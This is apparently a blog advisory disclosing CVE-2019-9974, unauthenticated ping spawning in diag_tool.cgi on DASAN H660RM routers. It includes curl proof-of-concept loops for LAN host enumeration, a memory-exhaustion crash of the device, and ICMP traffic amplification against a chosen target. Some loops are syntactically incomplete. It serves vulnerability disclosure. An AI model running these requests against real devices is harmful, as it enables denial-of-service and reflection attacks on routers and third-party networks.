diag_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 allows spawning ping processes without any authorization leading to information disclosure and DoS attacks

diag_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 allows spawning ping processes without any authorization leading to device enumeration on LAN interface and DoS attacks against both device and network.

CWE-862: Missing Authorization weakness in diag_tool.cgi allows remote attacker to spawn ping (and traceroute) processes on affected devices without authorization. Moreover similar bug in diag_get_result.cgi allows attacker to retrieve command output. Arbitrary command injection using ; or ` (back ticks) does not seems to work (which make this different than CVE-2018-10561 and CVE-2018-17869).

This vulnerability was assigned CVE-2019-9974.

Information disclosure

Remote attacker could enumerate hosts on LAN interface sending requests to /cgi-bin/diag_tool.cgi with ip parameter set to target IP address. Lack of authorization in /cgi-bin/diag_get_result.cgi allow retrieval of results. Each call to diag_get_result.cgi retrieves one line of ping (or traceroute) output. The only argument is line number. Lines 1-4 are reserved for diagnostic interface PASS/FAIL reporting and should be ignored. $1 is vulnerable router. $2 is target device.

curl -k "http://$1/cgi-bin/diag_tool.cgi?ip=$2&cmd=ping&c=3&s=1&e=1&f=1&g=1"

sleep 10

for LINENO in $(seq 5 15)
    curl -k "http://$1/cgi-bin/diag_get_result.cgi?a=$LINENO" 2>/dev/null | \
        sed -e 's/\n//g'

Denial of service against device

Same CGI script has another weakness, CWE-400: Uncontrolled Resource Consumption, which allows memory memory exhaustion Denial of Service (DoS) attack against device. Around 170 spawned ping processes is enough to cause crash and reboot of router. PoC follows.

for I in $(seq 0 200); do
    echo $I
    curl -k -m0.1 "http://$1/cgi-bin/diag_tool.cgi?ip=$2&cmd=ping&c=999999&s=1&e=1&f=1&g=1"

Traffic reflection and amplification

As diag_tool.cgi does not enforce any limits on ping command arguments, so attacker can easily combine large c parameter (number of packets) with maximal s parameter (size of single ICMP message). This makes DASAN device great traffic amplifier where single HTTP GET call can reflect 999999999*65507 bytes to target. Theoretical amplification is about 65TB (ICMP message len * 999…) for each ~2kB GET request. Pretty amazing comparing to memcached amplification (up to 1MB of response per request) or SSDP amplification (up to 26x bandwidth amplification).

As ping sends one packet per second and up to 150 simultaneous ping processes could be spawned without risking device crash theoretical ICMP traffic is 65507*150 bytes per second (or ~9MB/s or 72 Mbps).

for I in $(seq 0 150); do
    curl -k -m0.1 "http://$1/cgi-bin/diag_tool.cgi?ip=$2&cmd=ping&c=999999999&s=65507&e=1&f=1&g=1"

Note on 9s. Busybox’s ping seem to support up to 999999999 (9 times 9) as maximal -c param, while iputils’ ping supports up to 99999999999 (11 times 9).

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>




This site uses Akismet to reduce spam. Learn how your comment data is processed.